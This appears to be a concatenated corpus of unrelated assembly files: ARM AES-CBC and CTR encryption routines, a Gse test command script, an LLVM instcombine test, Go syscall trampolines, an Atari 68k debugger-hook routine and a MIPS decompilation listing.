.align 5
_aes_v8_cbc_encrypt:
mov ip,sp
stmdb sp!,{r4,r5,r6,r7,r8,lr}
vstmdb sp!,{d8,d9,d10,d11,d12,d13,d14,d15} @ ABI specification says so
ldmia ip,{r4,r5} @ load remaining args (ivec, enc flag)
subs r2,r2,#16
mov r8,#16 @ r8 = input post-increment; zeroed on last block
blo Lcbc_abort
moveq r8,#0
cmp r5,#0 @ en- or decrypting?
ldr r5,[r3,#240]
and r2,r2,#-16 @ round length down to whole blocks
vld1.8 {q6},[r4] @ q6 = IV
vld1.8 {q0},[r0],r8
vld1.32 {q8,q9},[r3] @ load key schedule...
sub r5,r5,#6
add r7,r3,r5,lsl#4 @ pointer to last 7 round keys
sub r5,r5,#2
vld1.32 {q10,q11},[r7]!
vld1.32 {q12,q13},[r7]!
vld1.32 {q14,q15},[r7]!
vld1.32 {q7},[r7] @ q7 = last round key
add r7,r3,#32
mov r6,r5
beq Lcbc_dec
@ ---- CBC encrypt ----
cmp r5,#2 @ r5==2 => 10 rounds => AES-128 fast path
veor q0,q0,q6 @ first block XOR IV
veor q5,q8,q7 @ q5 = rndkey[0]^rndkey[last], folded into input XOR
beq Lcbc_enc128
@ General (192/256) path: stash round keys 2,3 in q2,q3 and keep
@ pointers to the remaining early round keys in r6/r12/r14/r3.
vld1.32 {q2,q3},[r7]
add r7,r3,#16
add r6,r3,#16*4
add r12,r3,#16*5
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
add r14,r3,#16*6
add r3,r3,#16*7
b Lenter_cbc_enc
.align 4
Loop_cbc_enc:
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vst1.8 {q6},[r1]! @ store previous ciphertext block
Lenter_cbc_enc:
.byte 0x22,0x03,0xb0,0xf3 @ aese q0,q9
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x04,0x03,0xb0,0xf3 @ aese q0,q2
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vld1.32 {q8},[r6]
cmp r5,#4 @ r5==4 => 12 rounds => AES-192, skip two rounds
.byte 0x06,0x03,0xb0,0xf3 @ aese q0,q3
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vld1.32 {q9},[r12]
beq Lcbc_enc192
@ AES-256 only: two extra rounds.
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vld1.32 {q8},[r14]
.byte 0x22,0x03,0xb0,0xf3 @ aese q0,q9
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vld1.32 {q9},[r3]
nop
Lcbc_enc192:
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
subs r2,r2,#16
.byte 0x22,0x03,0xb0,0xf3 @ aese q0,q9
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
moveq r8,#0 @ stop advancing input after the last block
.byte 0x24,0x03,0xb0,0xf3 @ aese q0,q10
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x26,0x03,0xb0,0xf3 @ aese q0,q11
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vld1.8 {q8},[r0],r8 @ prefetch next plaintext block
.byte 0x28,0x03,0xb0,0xf3 @ aese q0,q12
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
veor q8,q8,q5 @ pre-XOR next block with rndkey[0]^rndkey[last]
.byte 0x2a,0x03,0xb0,0xf3 @ aese q0,q13
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vld1.32 {q9},[r7] @ re-pre-load rndkey[1]
.byte 0x2c,0x03,0xb0,0xf3 @ aese q0,q14
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x2e,0x03,0xb0,0xf3 @ aese q0,q15
veor q6,q0,q7 @ q6 = ciphertext = new IV
bhs Loop_cbc_enc
vst1.8 {q6},[r1]! @ flush final ciphertext block
b Lcbc_done
.align 5
Lcbc_enc128:
@ AES-128 encrypt path: the entire schedule fits in registers.
vld1.32 {q2,q3},[r7]
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
b Lenter_cbc_enc128
Loop_cbc_enc128:
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vst1.8 {q6},[r1]!
Lenter_cbc_enc128:
.byte 0x22,0x03,0xb0,0xf3 @ aese q0,q9
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
subs r2,r2,#16
.byte 0x04,0x03,0xb0,0xf3 @ aese q0,q2
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
moveq r8,#0
.byte 0x06,0x03,0xb0,0xf3 @ aese q0,q3
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x24,0x03,0xb0,0xf3 @ aese q0,q10
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x26,0x03,0xb0,0xf3 @ aese q0,q11
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vld1.8 {q8},[r0],r8
.byte 0x28,0x03,0xb0,0xf3 @ aese q0,q12
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x2a,0x03,0xb0,0xf3 @ aese q0,q13
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x2c,0x03,0xb0,0xf3 @ aese q0,q14
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
veor q8,q8,q5
.byte 0x2e,0x03,0xb0,0xf3 @ aese q0,q15
veor q6,q0,q7
bhs Loop_cbc_enc128
vst1.8 {q6},[r1]!
b Lcbc_done
.align 5
Lcbc_dec:
@ ---- CBC decrypt, 3-blocks-wide pipeline ----
@ q0/q1/q10 hold the blocks in flight; q2/q3/q11 keep the raw
@ ciphertext so it can become the "previous block" for the XOR.
vld1.8 {q10},[r0]!
subs r2,r2,#32 @ bias
add r6,r5,#2
vorr q3,q0,q0
vorr q1,q0,q0
vorr q11,q10,q10
blo Lcbc_dec_tail
vorr q1,q10,q10
vld1.8 {q10},[r0]!
vorr q2,q0,q0
vorr q3,q1,q1
vorr q11,q10,q10
Loop3x_cbc_dec:
@ Inner round loop: two rounds per iteration on all three blocks.
.byte 0x60,0x03,0xb0,0xf3 @ aesd q0,q8
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0x60,0x23,0xb0,0xf3 @ aesd q1,q8
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x60,0x43,0xf0,0xf3 @ aesd q10,q8
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
vld1.32 {q8},[r7]!
subs r6,r6,#2
.byte 0x62,0x03,0xb0,0xf3 @ aesd q0,q9
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0x62,0x23,0xb0,0xf3 @ aesd q1,q9
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x62,0x43,0xf0,0xf3 @ aesd q10,q9
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
vld1.32 {q9},[r7]!
bgt Loop3x_cbc_dec
@ Final rounds interleaved with preparing the CBC XOR masks
@ (previous ciphertext ^ last round key) and loading next input.
.byte 0x60,0x03,0xb0,0xf3 @ aesd q0,q8
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0x60,0x23,0xb0,0xf3 @ aesd q1,q8
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x60,0x43,0xf0,0xf3 @ aesd q10,q8
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
veor q4,q6,q7 @ q4 = IV ^ last round key
subs r2,r2,#0x30
veor q5,q2,q7 @ q5 = ctext[i-1] ^ last round key
movlo r6,r2 @ r6 is zero at this point (taken only on final pass)
.byte 0x62,0x03,0xb0,0xf3 @ aesd q0,q9
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0x62,0x23,0xb0,0xf3 @ aesd q1,q9
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x62,0x43,0xf0,0xf3 @ aesd q10,q9
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
veor q9,q3,q7
add r0,r0,r6 @ r0 is adjusted in such way that
@ at exit from the loop q1-q10
@ are loaded with last "words"
vorr q6,q11,q11 @ carry last raw ciphertext forward as next IV
mov r7,r3
.byte 0x68,0x03,0xb0,0xf3 @ aesd q0,q12
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0x68,0x23,0xb0,0xf3 @ aesd q1,q12
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x68,0x43,0xf0,0xf3 @ aesd q10,q12
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
vld1.8 {q2},[r0]!
.byte 0x6a,0x03,0xb0,0xf3 @ aesd q0,q13
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0x6a,0x23,0xb0,0xf3 @ aesd q1,q13
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x6a,0x43,0xf0,0xf3 @ aesd q10,q13
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
vld1.8 {q3},[r0]!
.byte 0x6c,0x03,0xb0,0xf3 @ aesd q0,q14
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0x6c,0x23,0xb0,0xf3 @ aesd q1,q14
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x6c,0x43,0xf0,0xf3 @ aesd q10,q14
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
vld1.8 {q11},[r0]!
.byte 0x6e,0x03,0xb0,0xf3 @ aesd q0,q15
.byte 0x6e,0x23,0xb0,0xf3 @ aesd q1,q15
.byte 0x6e,0x43,0xf0,0xf3 @ aesd q10,q15
vld1.32 {q8},[r7]! @ re-pre-load rndkey[0]
add r6,r5,#2
veor q4,q4,q0 @ complete CBC XOR => plaintext
veor q5,q5,q1
veor q10,q10,q9
vld1.32 {q9},[r7]! @ re-pre-load rndkey[1]
vst1.8 {q4},[r1]!
vorr q0,q2,q2 @ rotate next three ciphertext blocks in
vst1.8 {q5},[r1]!
vorr q1,q3,q3
vst1.8 {q10},[r1]!
vorr q10,q11,q11
bhs Loop3x_cbc_dec
cmn r2,#0x30 @ exactly consumed everything?
beq Lcbc_done
nop
Lcbc_dec_tail:
@ 1-2 remaining blocks: q1 and q10 in flight (q1 result discarded
@ in the single-block case).
.byte 0x60,0x23,0xb0,0xf3 @ aesd q1,q8
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x60,0x43,0xf0,0xf3 @ aesd q10,q8
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
vld1.32 {q8},[r7]!
subs r6,r6,#2
.byte 0x62,0x23,0xb0,0xf3 @ aesd q1,q9
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x62,0x43,0xf0,0xf3 @ aesd q10,q9
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
vld1.32 {q9},[r7]!
bgt Lcbc_dec_tail
.byte 0x60,0x23,0xb0,0xf3 @ aesd q1,q8
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x60,0x43,0xf0,0xf3 @ aesd q10,q8
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
.byte 0x62,0x23,0xb0,0xf3 @ aesd q1,q9
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x62,0x43,0xf0,0xf3 @ aesd q10,q9
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
.byte 0x68,0x23,0xb0,0xf3 @ aesd q1,q12
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x68,0x43,0xf0,0xf3 @ aesd q10,q12
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
cmn r2,#0x20 @ one block left or two?
.byte 0x6a,0x23,0xb0,0xf3 @ aesd q1,q13
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x6a,0x43,0xf0,0xf3 @ aesd q10,q13
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
veor q5,q6,q7
.byte 0x6c,0x23,0xb0,0xf3 @ aesd q1,q14
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x6c,0x43,0xf0,0xf3 @ aesd q10,q14
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
veor q9,q3,q7
.byte 0x6e,0x23,0xb0,0xf3 @ aesd q1,q15
.byte 0x6e,0x43,0xf0,0xf3 @ aesd q10,q15
beq Lcbc_dec_one
veor q5,q5,q1
veor q9,q9,q10
vorr q6,q11,q11
vst1.8 {q5},[r1]!
vst1.8 {q9},[r1]!
b Lcbc_done
Lcbc_dec_one:
veor q5,q5,q10
vorr q6,q11,q11
vst1.8 {q5},[r1]!
Lcbc_done:
vst1.8 {q6},[r4] @ write final IV back to ivec
Lcbc_abort:
vldmia sp!,{d8,d9,d10,d11,d12,d13,d14,d15}
ldmia sp!,{r4,r5,r6,r7,r8,pc}
@-----------------------------------------------------------------------
@ void aes_v8_ctr32_encrypt_blocks(const unsigned char *in,
@                                  unsigned char *out, size_t len,
@                                  const AES_KEY *key,
@                                  const unsigned char ivec[16])
@ In:  r0 = in, r1 = out, r2 = len (in 16-byte blocks),
@      r3 = key schedule; stack arg: r4 = ivec (counter block).
@ CTR mode with a 32-bit big-endian counter in the last word of ivec.
@ Three counter blocks (q0,q1,q10) are encrypted per main-loop
@ iteration (Loop3x_ctr32); the counter word is byte-reversed into r8
@ on little-endian and incremented in the integer unit while the NEON
@ pipeline works.  1-2 leftover blocks are handled in Lctr32_tail.
@ The last 5 round keys stay resident in q12-q15/q7.
@-----------------------------------------------------------------------
.globl _aes_v8_ctr32_encrypt_blocks
#ifdef __thumb2__
.thumb_func _aes_v8_ctr32_encrypt_blocks
#endif
.align 5
_aes_v8_ctr32_encrypt_blocks:
mov ip,sp
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,lr}
vstmdb sp!,{d8,d9,d10,d11,d12,d13,d14,d15} @ ABI specification says so
ldr r4, [ip] @ load remaining arg (ivec)
ldr r5,[r3,#240]
ldr r8, [r4, #12] @ r8 = counter word (big-endian in memory)
vld1.32 {q0},[r4]
vld1.32 {q8,q9},[r3] @ load key schedule...
sub r5,r5,#4
mov r12,#16
cmp r2,#2
add r7,r3,r5,lsl#4 @ pointer to last 5 round keys
sub r5,r5,#2
vld1.32 {q12,q13},[r7]!
vld1.32 {q14,q15},[r7]!
vld1.32 {q7},[r7] @ q7 = last round key
add r7,r3,#32
mov r6,r5
movlo r12,#0 @ single block: don't advance input pointer
#ifndef __ARMEB__
rev r8, r8 @ counter to host order for arithmetic
#endif
@ Materialize three consecutive counter blocks in q0,q1,q10.
vorr q1,q0,q0
add r10, r8, #1
vorr q10,q0,q0
add r8, r8, #2
vorr q6,q0,q0 @ q6 = template counter block
rev r10, r10
vmov.32 d3[1],r10 @ q1.counter = base+1
bls Lctr32_tail
rev r12, r8
sub r2,r2,#3 @ bias
vmov.32 d21[1],r12 @ q10.counter = base+2
b Loop3x_ctr32
.align 4
Loop3x_ctr32:
@ Inner round loop: two rounds per iteration on all three blocks.
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x20,0x23,0xb0,0xf3 @ aese q1,q8
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
.byte 0x20,0x43,0xf0,0xf3 @ aese q10,q8
.byte 0xa4,0x43,0xf0,0xf3 @ aesmc q10,q10
vld1.32 {q8},[r7]!
subs r6,r6,#2
.byte 0x22,0x03,0xb0,0xf3 @ aese q0,q9
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x22,0x23,0xb0,0xf3 @ aese q1,q9
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
.byte 0x22,0x43,0xf0,0xf3 @ aese q10,q9
.byte 0xa4,0x43,0xf0,0xf3 @ aesmc q10,q10
vld1.32 {q9},[r7]!
bgt Loop3x_ctr32
@ Final rounds: results migrate to q4/q5/q9 so q0/q1/q10 can be
@ reloaded with the next three counter blocks in parallel, while
@ input is fetched and pre-XORed with the last round key.
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x83,0xb0,0xf3 @ aesmc q4,q0
.byte 0x20,0x23,0xb0,0xf3 @ aese q1,q8
.byte 0x82,0xa3,0xb0,0xf3 @ aesmc q5,q1
vld1.8 {q2},[r0]!
vorr q0,q6,q6
.byte 0x20,0x43,0xf0,0xf3 @ aese q10,q8
.byte 0xa4,0x43,0xf0,0xf3 @ aesmc q10,q10
vld1.8 {q3},[r0]!
vorr q1,q6,q6
.byte 0x22,0x83,0xb0,0xf3 @ aese q4,q9
.byte 0x88,0x83,0xb0,0xf3 @ aesmc q4,q4
.byte 0x22,0xa3,0xb0,0xf3 @ aese q5,q9
.byte 0x8a,0xa3,0xb0,0xf3 @ aesmc q5,q5
vld1.8 {q11},[r0]!
mov r7,r3
.byte 0x22,0x43,0xf0,0xf3 @ aese q10,q9
.byte 0xa4,0x23,0xf0,0xf3 @ aesmc q9,q10
vorr q10,q6,q6
add r9,r8,#1
.byte 0x28,0x83,0xb0,0xf3 @ aese q4,q12
.byte 0x88,0x83,0xb0,0xf3 @ aesmc q4,q4
.byte 0x28,0xa3,0xb0,0xf3 @ aese q5,q12
.byte 0x8a,0xa3,0xb0,0xf3 @ aesmc q5,q5
veor q2,q2,q7 @ input ^ last round key
add r10,r8,#2
.byte 0x28,0x23,0xf0,0xf3 @ aese q9,q12
.byte 0xa2,0x23,0xf0,0xf3 @ aesmc q9,q9
veor q3,q3,q7
add r8,r8,#3
.byte 0x2a,0x83,0xb0,0xf3 @ aese q4,q13
.byte 0x88,0x83,0xb0,0xf3 @ aesmc q4,q4
.byte 0x2a,0xa3,0xb0,0xf3 @ aese q5,q13
.byte 0x8a,0xa3,0xb0,0xf3 @ aesmc q5,q5
veor q11,q11,q7
rev r9,r9
.byte 0x2a,0x23,0xf0,0xf3 @ aese q9,q13
.byte 0xa2,0x23,0xf0,0xf3 @ aesmc q9,q9
vmov.32 d1[1], r9 @ patch counter into next q0
rev r10,r10
.byte 0x2c,0x83,0xb0,0xf3 @ aese q4,q14
.byte 0x88,0x83,0xb0,0xf3 @ aesmc q4,q4
.byte 0x2c,0xa3,0xb0,0xf3 @ aese q5,q14
.byte 0x8a,0xa3,0xb0,0xf3 @ aesmc q5,q5
vmov.32 d3[1], r10 @ patch counter into next q1
rev r12,r8
.byte 0x2c,0x23,0xf0,0xf3 @ aese q9,q14
.byte 0xa2,0x23,0xf0,0xf3 @ aesmc q9,q9
vmov.32 d21[1], r12 @ patch counter into next q10
subs r2,r2,#3
.byte 0x2e,0x83,0xb0,0xf3 @ aese q4,q15
.byte 0x2e,0xa3,0xb0,0xf3 @ aese q5,q15
.byte 0x2e,0x23,0xf0,0xf3 @ aese q9,q15
veor q2,q2,q4 @ complete keystream XOR
vld1.32 {q8},[r7]! @ re-pre-load rndkey[0]
vst1.8 {q2},[r1]!
veor q3,q3,q5
mov r6,r5
vst1.8 {q3},[r1]!
veor q11,q11,q9
vld1.32 {q9},[r7]! @ re-pre-load rndkey[1]
vst1.8 {q11},[r1]!
bhs Loop3x_ctr32
@ 0-2 blocks remain (r2 was biased by 3 above).
adds r2,r2,#3
beq Lctr32_done
cmp r2,#1
mov r12,#16
moveq r12,#0
Lctr32_tail:
@ Tail path: process q0 (and q1, whose result is only stored when a
@ second block actually remains).
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x20,0x23,0xb0,0xf3 @ aese q1,q8
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
vld1.32 {q8},[r7]!
subs r6,r6,#2
.byte 0x22,0x03,0xb0,0xf3 @ aese q0,q9
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x22,0x23,0xb0,0xf3 @ aese q1,q9
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
vld1.32 {q9},[r7]!
bgt Lctr32_tail
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x20,0x23,0xb0,0xf3 @ aese q1,q8
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
.byte 0x22,0x03,0xb0,0xf3 @ aese q0,q9
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x22,0x23,0xb0,0xf3 @ aese q1,q9
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
vld1.8 {q2},[r0],r12
.byte 0x28,0x03,0xb0,0xf3 @ aese q0,q12
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x28,0x23,0xb0,0xf3 @ aese q1,q12
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
vld1.8 {q3},[r0]
.byte 0x2a,0x03,0xb0,0xf3 @ aese q0,q13
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x2a,0x23,0xb0,0xf3 @ aese q1,q13
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
veor q2,q2,q7
.byte 0x2c,0x03,0xb0,0xf3 @ aese q0,q14
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x2c,0x23,0xb0,0xf3 @ aese q1,q14
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
veor q3,q3,q7
.byte 0x2e,0x03,0xb0,0xf3 @ aese q0,q15
.byte 0x2e,0x23,0xb0,0xf3 @ aese q1,q15
cmp r2,#1
veor q2,q2,q0
veor q3,q3,q1
vst1.8 {q2},[r1]!
beq Lctr32_done
vst1.8 {q3},[r1]
Lctr32_done:
vldmia sp!,{d8,d9,d10,d11,d12,d13,d14,d15}
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,pc}
#endif
| {
"language": "Assembly"
} |
# This is a script containing a set of commands to execute via the Gse scripting API.
# Run it by entering: run_ref_cmds.sh test_cmds.txt
CMD_NO_OP # No-op command (sanity check that command dispatch works)
CMD_NO_OP_STRING, "A string" # No-op command carrying a string argument
SB_START_PKTS # Start sending packets
SB_INJECT_PKT_ERROR # Inject an error (NOTE(review): presumably a packet-level fault for error-path testing — confirm against the Gse command dictionary)
| {
"language": "Assembly"
} |
; RUN: opt < %s -instcombine -disable-output
; Regression test: extract of lane 2 from a vector whose lane 3 was just
; overwritten by insertelement.  The inserted and extracted lanes are
; disjoint, so InstCombine may fold straight through the insert.
; With -disable-output the RUN line only verifies the pass completes
; without crashing or asserting.
define float @test(<4 x float> %V) {
%V2 = insertelement <4 x float> %V, float 1.000000e+00, i32 3 ; <<4 x float>> [#uses=1]
%R = extractelement <4 x float> %V2, i32 2 ; <float> [#uses=1]
ret float %R
}
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for AMD64, DragonFly
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
// Tail-jump trampoline into package syscall's Syscall implementation.
// NOSPLIT, zero-byte frame; $0-56 = 56 bytes of caller-provided
// arguments+results passed through untouched.
TEXT ·Syscall(SB),NOSPLIT,$0-56
JMP syscall·Syscall(SB)
// Tail-jump trampoline into package syscall's Syscall6 ($0-80: 80 bytes
// of pass-through args+results).
TEXT ·Syscall6(SB),NOSPLIT,$0-80
JMP syscall·Syscall6(SB)
// Tail-jump trampoline into package syscall's Syscall9 ($0-104: 104 bytes
// of pass-through args+results).
TEXT ·Syscall9(SB),NOSPLIT,$0-104
JMP syscall·Syscall9(SB)
// Tail-jump trampoline into package syscall's RawSyscall (no runtime
// entry/exit hooks; same 56-byte arg/result layout as Syscall).
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
JMP syscall·RawSyscall(SB)
// Tail-jump trampoline into package syscall's RawSyscall6 ($0-80: 80
// bytes of pass-through args+results).
TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
JMP syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
***********************************
*=================================*
* RESERVOIR GODS LIBRARY ROUTINES *
*=================================*
* | | *
* |DISK_OS LIBRARY | *
* | | *
***********************************
* CODE: MR. PINK | (C): 28/07/96 *
***********************************
SECTION CSECT
xdef rlbssd_open
xdef rlbssd_close
xref rlbssd_new_set_screen
**************************************************************************
SECTION TEXT
**************************************************************************
* Install the BSS-debugger hook.
* Looks for the magic longword "BSSD" at $40.w and a module pointer at
* $44.w; if both are present, patches the pointed-to module in place so
* that its set-screen routine is redirected to rlbssd_new_set_screen,
* then clears $40/$44 so the patch is applied only once.
* NOTE(review): the immediates written below are m68k opcodes being
* poked into the target ($67f8 = beq.s -8, $4ef9 = jmp abs.l,
* $23fc/$33fc = move.l/move.w #imm,abs.l, $4e75 = rts) — the exact
* patched sequence should be confirmed against the BSSD module layout.
* Preserves a0-a2; no return value.
rlbssd_bss_debug_constructor:
movem.l a0-2,-(a7)
* Bail out unless the BSSD signature and module pointer are set.
cmp.l #"BSSD",$40.w
bne .notins
tst.l $44.w
beq .notins
move.l $44.w,a0
* Redirect the module's code at offset $4332 to our replacement routine.
move.w #$67f8,$4324(a0)
move.w #$4ef9,$4332(a0)
lea rlbssd_new_set_screen,a1
move.l a1,$4332+2(a0)
* Shift 10 bytes at offset $830 up by 18 to open a gap for the stub.
lea $830(a0),a2
lea 18(a2),a1
move.l -(a2),-(a1)
move.l -(a2),-(a1)
move.w -(a2),-(a1)
* Build the trampoline instructions in the gap (written backwards).
lea $4332(a0),a2
move.l a2,-(a1)
move.l #$426e0058,-(a1)
move.w #$23fc,-(a1)
addq.w #4,a2
move.l a2,-(a1)
move.l #$33fc4e75,-(a1)
* Consume the handshake so we never patch twice.
clr.l $40.w
clr.l $44.w
.notins
movem.l (a7)+,a0-2
rts
* Tear down the BSS-debugger handshake: clear the signature longword at
* $40.w and the module pointer at $44.w so no further patching occurs.
rlbssd_bss_debug_deconstructor:
clr.l $40.w
clr.l $44.w
rts
| {
"language": "Assembly"
} |
# Matched MIPS disassembly (decomp project).  The instruction words and
# their original `##` annotations must remain byte-identical to keep the
# match against the ROM; only standalone comments are added here.
# Overview (from the visible code): dispatches on the byte at actor+0x2F8
# (values 2/3 exit early); otherwise, depending on flag bits at +0x3FD /
# +0x331, either clamps the animation frame (+0x164) against
# SkelAnime_GetFrameCount(0x0600485C) minus 2, or runs the collision /
# damage path: func_80035650, Actor_ApplyDamage, health checks at +0xAF,
# possible Actor_ChangeType, sounds, and Flags_SetSwitch.
# NOTE(review): field semantics are inferred from call targets only —
# confirm against the actor's C struct before relying on them.
glabel func_80A75C38
/* 01928 80A75C38 27BDFFB0 */ addiu $sp, $sp, 0xFFB0 ## $sp = FFFFFFB0
/* 0192C 80A75C3C AFBF0024 */ sw $ra, 0x0024($sp)
/* 01930 80A75C40 AFB00020 */ sw $s0, 0x0020($sp)
/* 01934 80A75C44 AFA50054 */ sw $a1, 0x0054($sp)
/* 01938 80A75C48 908202F8 */ lbu $v0, 0x02F8($a0) ## 000002F8
/* 0193C 80A75C4C 24010003 */ addiu $at, $zero, 0x0003 ## $at = 00000003
/* 01940 80A75C50 00808025 */ or $s0, $a0, $zero ## $s0 = 00000000
/* 01944 80A75C54 104100CD */ beq $v0, $at, .L80A75F8C
/* 01948 80A75C58 24010002 */ addiu $at, $zero, 0x0002 ## $at = 00000002
/* 0194C 80A75C5C 504100CC */ beql $v0, $at, .L80A75F90
/* 01950 80A75C60 8FBF0024 */ lw $ra, 0x0024($sp)
/* 01954 80A75C64 908E03FD */ lbu $t6, 0x03FD($a0) ## 000003FD
/* 01958 80A75C68 3C040600 */ lui $a0, 0x0600 ## $a0 = 06000000
/* 0195C 80A75C6C 31CF0080 */ andi $t7, $t6, 0x0080 ## $t7 = 00000000
/* 01960 80A75C70 51E00016 */ beql $t7, $zero, .L80A75CCC
/* 01964 80A75C74 920A0331 */ lbu $t2, 0x0331($s0) ## 00000331
# Flag 0x80 at +0x3FD set: clamp anim frame to frameCount-2, then clear
# the flag and bit 2 of +0x331.
/* 01968 80A75C78 0C028800 */ jal SkelAnime_GetFrameCount
/* 0196C 80A75C7C 2484485C */ addiu $a0, $a0, 0x485C ## $a0 = 0600485C
/* 01970 80A75C80 44822000 */ mtc1 $v0, $f4 ## $f4 = 0.00
/* 01974 80A75C84 3C014000 */ lui $at, 0x4000 ## $at = 40000000
/* 01978 80A75C88 44814000 */ mtc1 $at, $f8 ## $f8 = 2.00
/* 0197C 80A75C8C 468021A0 */ cvt.s.w $f6, $f4
/* 01980 80A75C90 C60A0164 */ lwc1 $f10, 0x0164($s0) ## 00000164
/* 01984 80A75C94 46083001 */ sub.s $f0, $f6, $f8
